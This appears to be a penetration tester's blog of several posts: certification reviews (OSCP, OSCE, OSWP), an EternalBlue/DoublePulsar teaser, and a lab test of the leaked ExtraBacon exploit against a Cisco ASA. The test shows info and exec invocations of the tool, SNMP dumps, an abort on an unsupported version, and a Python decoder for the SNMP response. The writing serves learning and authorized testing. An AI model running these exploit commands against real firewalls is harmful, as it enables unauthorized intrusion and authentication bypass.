EternalBlue NSA Leak Exploit Test!

Hello everyone, sorry I have been away for a while, but I am currently serving in the army.
Here is a teaser for the EternalBlue exploit, one of the NSA tools leaked by the Shadow Brokers, combined with Meterpreter!

You can see the exploit being set up and fired, and then DoublePulsar being used to execute the Meterpreter payload on the victim.


Finally OSCE Certified!


Hello to everyone who checks my blog 🙂 I finally managed to get OSCE.
I have many things to tell you about it. The Cracking the Perimeter course doesn't have a lab, not like OSCP's anyway.
Although it does contain about 5 machines that will help you go through the PDF and redo the exercises.
In my opinion, OSCE was much easier compared to OSCP, because all you needed was actually in the PDF. OSCP's knowledge was vast, but in OSCE not so much; it was quite concentrated.
It might need some more advanced knowledge than OSCP, but it was easy if you have it.
So a few things about the exam and that is it! The exam had four challenges. You had to score
at least 75/90. Yes, the top grade is 90, not 100. The challenges were worth 15, 15, 30 and 30 points.
So you could pretty much skip one of the 15-point challenges. One of the 15-point challenges is pretty easy 😀 The rest were kind of hard, but not that much. On a scale of 1 to 10, I would say 6? Maybe 7? And you have 48 hours. In conclusion, you have quite good chances of passing this as long as you do have the necessary knowledge!
It feels great that I managed to get this knowledge, and I am down for trying OSEE in a couple of years, when I will have a good job that will pay for it. It is too expensive!

That is all, people 😉 CYA.
Everyone have fun and take care!

ExtraBacon Test On ASA Firewall

Hello everyone. I found some free time today and thought I would give the ExtraBacon exploit from the NSA leak a shot...
There are already some successful write-ups out there about it, but I wanted to show you what happens on a newer ASA firewall when the exploit fails.

ExtraBacon is a remote code execution exploit against Cisco Adaptive Security Appliance (ASA) devices (CVE-2016-6366). The leaked script ships payload offsets for ASA releases 8.0(2), 8.0(3), 8.0(4), 8.0(5), 8.2(1), 8.2(2), 8.2(3), 8.2(4), 8.2(5), 8.3(1), 8.3(2), 8.4(1), 8.4(2), 8.4(3) and 8.4(4). It exploits a buffer overflow in the appliance's SNMP handling, so it needs SNMP reachable on the target and a valid community string (the -c option below), and it relies on first reading the target's software version and uptime over SNMP, because the payload it builds depends on both. Two caveats for anyone reproducing this: the version list above is what the tool has offsets for, not the full set of vulnerable releases, since Cisco's advisory for CVE-2016-6366 listed all ASA Software releases as affected; so when the script reports a target as "NOT supported" it means the tool has no payload for that release, not that the device is patched. And even the failing run below sends real SNMP GetRequests to the firewall, so only point it at a device you own or are authorized to test.

In my case I installed a firewall running ASA 9.2(1) and of course it didn't work as expected. This version is not affected.
This is the output of the info mode:


root@trickster0-virtual-machine:/home/trickster0/Desktop/EXBA# python extrabacon_1.1.0.1.py info -t 192.168.0.128 -v -c public
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/trickster0/Desktop/EXBA/concernedparent
[+] Executing: extrabacon_1.1.0.1.py info -t 192.168.0.128 -v -c public
[+] running from /home/trickster0/Desktop/EXBA
[+] probing target via snmp
[+] Connecting to 192.168.0.128:161
****************************************
[+] Data returned
[+] 0000 30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02 0}.....public.p.
[+] 0010 01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06 ........0e0<..+.
[+] 0020 01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64 .......0Cisco Ad
[+] 0030 61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20 aptive Security
[+] 0040 41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F Appliance Versio
[+] 0050 6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02 n 9.2(1)0...+...
[+] 0060 01 01 03 00 43 03 00 92 E0 30 14 06 08 2B 06 01 ....C....0...+..
[+] 0070 02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61 .......ciscoasa
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
[+] End of Data returned

[+] response:
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =

[+] firewall uptime is 37600 time ticks, or 0:06:16

[+] firewall name is ciscoasa

[-] target is running Cisco Adaptive Security Appliance Version 9.2(1), which is NOT supported
Data stored in key file : unsupported
Data stored in self.vinfo: UNSUPPORTED

To check the key file to see if it really contains what we're claiming:
# cat /home/trickster0/Desktop/EXBA/keys/Y57qgB.key
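What the tool's info step is actually doing with that response, as an added example that is not part of the original post or of the leaked script: a dependency-free BER decoder for the SNMPv2c GetResponse shown in the hex dump above. It pulls out sysDescr, sysUpTime and sysName, parses the ASA release string, converts the TimeTicks value to the same 0:06:16 figure the tool prints, and compares the release against the list of versions the script has payload offsets for. The response bytes are copied from the dump; the function and constant names are my own and the supported-version set is the list quoted in the write-up above.

```python
"""Decode the SNMP GetResponse that an ExtraBacon-style probe relies on.

Added example, not the leaked tool's own code. It reads the raw BER bytes
captured in the write-up and extracts the three fields the probe needs:
sysDescr (software version), sysUpTime (TimeTicks) and sysName.
"""
import re

# Bytes copied from the hex dump of the ASA 9.2(1) response above.
RESPONSE = bytes.fromhex(
    "30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02"
    "01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06"
    "01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64"
    "61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20"
    "41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F"
    "6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02"
    "01 01 03 00 43 03 00 92 E0 30 14 06 08 2B 06 01"
    "02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61"
)

SYS_DESCR = "1.3.6.1.2.1.1.1.0"
SYS_UPTIME = "1.3.6.1.2.1.1.3.0"
SYS_NAME = "1.3.6.1.2.1.1.5.0"

# Releases the leaked script carries payload offsets for (list from the post).
SUPPORTED = {
    "8.0(2)", "8.0(3)", "8.0(4)", "8.0(5)",
    "8.2(1)", "8.2(2)", "8.2(3)", "8.2(4)", "8.2(5)",
    "8.3(1)", "8.3(2)",
    "8.4(1)", "8.4(2)", "8.4(3)", "8.4(4)",
}
VERSION_RE = re.compile(r"Version (\d+\.\d+\(\d+\))")


def _read_tlv(buf, pos):
    """Return (tag, value_bytes, next_pos) for the BER TLV at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long-form length (0x81 nn, 0x82 nn nn, ...)
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _children(value):
    """Split a constructed value into its list of (tag, raw) members."""
    out, pos = [], 0
    while pos < len(value):
        tag, raw, pos = _read_tlv(value, pos)
        out.append((tag, raw))
    return out


def _decode_oid(raw):
    arcs = [raw[0] // 40, raw[0] % 40]
    n = 0
    for b in raw[1:]:                      # base-128, high bit = continuation
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(n)
            n = 0
    return ".".join(map(str, arcs))


def _decode_value(tag, raw):
    if tag in (0x02, 0x41, 0x42, 0x43, 0x46):   # INTEGER, Counter32, Gauge32, TimeTicks, Counter64
        return int.from_bytes(raw, "big", signed=(tag == 0x02))
    if tag == 0x04:                             # OCTET STRING
        return raw.decode("ascii", "replace")
    if tag == 0x06:                             # OBJECT IDENTIFIER
        return _decode_oid(raw)
    return raw


def parse_snmp_response(data):
    """Parse an SNMPv1/v2c GetResponse message into a dict."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    (_, ver_raw), (_, comm_raw), (pdu_tag, pdu_raw) = _children(msg)
    if pdu_tag != 0xA2:
        raise ValueError("expected GetResponse PDU (0xA2), got 0x%02X" % pdu_tag)
    req_id, err_status, err_index, varbinds = _children(pdu_raw)
    binds = {}
    for _, vb in _children(varbinds[1]):
        (_, oid_raw), (val_tag, val_raw) = _children(vb)
        binds[_decode_oid(oid_raw)] = _decode_value(val_tag, val_raw)
    return {
        "version": int.from_bytes(ver_raw, "big"),      # 1 == SNMPv2c
        "community": comm_raw.decode("ascii", "replace"),
        "request_id": _decode_value(0x02, req_id[1]),
        "error_status": _decode_value(0x02, err_status[1]),
        "varbinds": binds,
    }


def probe_summary(data):
    """Mirror the probe's info step: name, version, uptime, supported?"""
    binds = parse_snmp_response(data)["varbinds"]
    descr = binds[SYS_DESCR]
    match = VERSION_RE.search(descr)
    version = match.group(1) if match else None
    ticks = binds[SYS_UPTIME]
    secs = ticks // 100                    # TimeTicks are hundredths of a second
    return {
        "name": binds[SYS_NAME],
        "descr": descr,
        "version": version,
        "uptime_ticks": ticks,
        "uptime": "%d:%02d:%02d" % (secs // 3600, secs % 3600 // 60, secs % 60),
        "supported": version in SUPPORTED,
    }


if __name__ == "__main__":
    for k, v in probe_summary(RESPONSE).items():
        print("%-13s %s" % (k, v))
```

Run it and you get name ciscoasa, version 9.2(1), uptime 0:06:16 from 37600 ticks and supported False, which is exactly the decision the tool made before printing "NOT supported". The decoder handles long-form BER lengths as well, so it also works on responses larger than 127 bytes, which a real sysDescr often is.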

This is the output of the exec mode:


root@trickster0-virtual-machine:/home/trickster0/Desktop/EXBA# python extrabacon_1.1.0.1.py exec -t 192.168.0.128 -v -c public --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/trickster0/Desktop/EXBA/concernedparent
[+] Executing: extrabacon_1.1.0.1.py exec -t 192.168.0.128 -v -c public --mode pass-disable
[+] running from /home/trickster0/Desktop/EXBA
[+] probing target via snmp
[+] Connecting to 192.168.0.128:161
****************************************
[+] Data returned
[+] 0000 30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02 0}.....public.p.
[+] 0010 01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06 ........0e0<..+.
[+] 0020 01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64 .......0Cisco Ad
[+] 0030 61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20 aptive Security
[+] 0040 41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F Appliance Versio
[+] 0050 6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02 n 9.2(1)0...+...
[+] 0060 01 01 03 00 43 03 00 E3 BC 30 14 06 08 2B 06 01 ....C....0...+..
[+] 0070 02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61 .......ciscoasa
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
[+] End of Data returned

[+] response:
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =

[+] firewall uptime is 58300 time ticks, or 0:09:43

[+] firewall name is ciscoasa

[-] target is running Cisco Adaptive Security Appliance Version 9.2(1), which is NOT supported
Data stored in key file : unsupported
Data stored in self.vinfo: UNSUPPORTED
[+] generating exploit for exec mode pass-disable
[-] unsupported target version, abort

I will try and test some more stuff for fun. Have a nice day, everyone!

OSWP Certified!


Hello everyone. It has been a while since I last wrote an article; I was busy at work. I took the OSWP exam.
The OSWP exam was super easy! I finished in about 40 minutes and then immediately wrote the report for it.
There was no WPS cracking, but it included all the attacks on WEP and WPA.
I studied the PDF in 4 hours, more like a quick read to remember stuff, since I had my experience with wireless hacking.
After a few days my pass verification email arrived. Nothing more to add on this subject. I am ready to take the OSCE exam now 🙂
Something unrelated to the exam: I found my first 0-day at the company I work for, an unauthenticated database download in the web application of a custom embedded device that my company provides to clients. 🙂 Unfortunately, they won't allow me to release the PoC 😥

That is all folks, have fun, bye!

OSCP Certified at last! + Review :D


Hello everyone.
I finally got my OSCP. I got the verification mail a couple of hours ago. I am quite happy.
Dear Thanasis,

We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification.

Offsec Lab Part

OK, so my experience in the lab was easier than I expected. The lab had 50 machines (51 actually, but I won't say why). Most of them are super easy, others were of medium difficulty and others were quite hard. The ones I found the hardest were FreeBSD and Humble! FreeBSD wasn't exactly hard, but it required too much trickiness.
I must say that when I was reading those reviews, people kept saying they would miss the labs, and I was thinking "yeah right, get that damn certificate, who cares about the lab", but I must say they were very fun! I was hacking all the time. Humble was hard because of so much trial and error that tired you out in the end.

Exam Part
OK, I must say that I didn't pass the first time, even though I completed all the machines in all the labs in 26 days.
But let me make a small comment here and say, DO NOT GET INTIMIDATED BY THIS!
The first mistake I made on my first exam was the fact that I read so many reviews.
Everyone was like "hardest exam ever, I couldn't pass and I had an IT background". OK, so ignore all of this, like I should have done.
That was my first mistake. The second mistake, which I can't really verify now, is the fact that I was scanning a host with nmap and 2 ports weren't appearing open.
I needed one of them to get a shell, then at the moment I was ready to give up, a friend sent me a script he uses to scan that utilized unicornscan.
I gave that a try and what do you know, it showed 2 more ports! I ran the exploit and got a shell right away! I had spent about 7 hours on that machine.
I don't know what the problem was. I told Offsec, of course, so that it would not happen again to anyone, but they told me it was working properly.
The third mistake was the fact that I could not sleep very well the previous day, so I got tired fast.
So if you add up all that stuff, it made me fail! Although I did the buffer overflow machine in 20 minutes.

The second time I took the exam, I was serious, I mean very, very serious. There was no way I would fail this. So I started that script (I will add it in the resources tab for anyone who is interested) while I took on the buffer overflow, which I hacked in 15 minutes 😛 (new record). Then I moved on to the 10-point machine, which surprisingly was a bit tricky but not difficult. I moved on to the 20-point machine, quickly rooted it, and then an idea popped up about the 10-point machine.
I came back and rooted it too. I got stuck on the other 20-point machine, so I moved on to the 25-point machine, on which I got a shell very quickly. In the end, I found not one but two different ways to escalate it. I don't know if that was intended or not; either way, they weren't easy to find. The last 20-point machine I couldn't hack. I reached up to a point, but nothing after that.
I sent my report the next day and the day after that Offsec sent me an email! My heart pounded like crazy! They told me they required more steps on the buffer overflow!!!! I was frozen! I was like, what am I going to do now? I didn't take screenshots of the previous steps. Thank God though, they just told me to write a detailed step-by-step description, which I did. It took about 20 minutes, but I was super stressed because of that. Obviously everything worked out though.

Conclusion

The OSCP was a great experience! It was the first time I did something like this, and I proved not only to myself but to everyone else that I am that good and I am going to move on to get even better! The sky is not the limit! The next universe is! I plan to surpass that too! Anyway, do not get intimidated by any reviews you see online, mine included! Of course, to take this course you cannot be a noob. Just because it is the first certificate Offensive Security provides does not mean it is an introductory one. Don't ask where you can start off. I really can't recommend you anything except this! The PDF is great for newbies, although networking and some basic programming must be a given to even begin this. Of course it would be great if you had some previous experience. Vulnhub is not a bad idea to check.

Anyway, that is my story. It was an awesome experience and I can't wait to go up against OSWP and OSCE. I would totally love to take on OSEE! It seems amazing.

I want to thank Offensive Security for this great experience and their whole structure, really! They are very organized, but one thing you should change is to add
a live chat for the challenges part. It stressed me really, really hard when they required more details and they didn't even give me an example.
That was the only problem I had. About the admins now! One name ----> Haken29a, the best guy I talked to from the admins, and ryujin is pretty cool.
Haken29a helped me so much with each problem I had about connectivity or other stuff.

Anyway, time to find a job as a pentester now, hopefully, and do some really deep research on buffer overflows!

OSCP Day 26

Hey everyone. I have finished hacking all the machines in the labs (public, dev, IT, admin) as of last night. The experience was great; I learnt a couple of things I didn't know. I used SSH port forwarding, which I had never used before because I didn't need to! As an overall review of the machines, I can say that they were super fun. I especially enjoyed the dev network, which happened to be the last one I hacked ^_^
So the machines in the labs are 49 if you exclude the MSF Pro one, which you do not hack, and I completed all of them 😀 Let's just hope that the exam will seem easy to me too! That is it!
Many thanks to Haken29a, who helped me A LOT as an admin with some issues. Haken, if you see this, thanks a lot, talk to me on IRC some time :P. Almost all the admins were great (only 1 bad one comes to mind, I won't say who :P). Have fun everyone... if you have any questions, please don't hesitate to ask. I will be on IRC, or you can leave a comment here. Bye 😉

OSCP Day 23

After so many days I decided to write my next review! Everything is great, 10 machines left to finish the whole lab (including IT, dev, admins). This was a great experience and I learnt a couple of new things! I will write one more review when I finish; it should be in 2-3 days. It took me a while because I went on a trip for 3 days for a CTF (a very hard one with TOO much social engineering). So after a point the machines seemed like child's play, although I had some issues with proxychains; I hope no one will run into them 😀 Up till now I can say that the hardest machines were FreeBSD and Humble. That is it for me! See you on my next review!! HAVE FUN EVERYONE!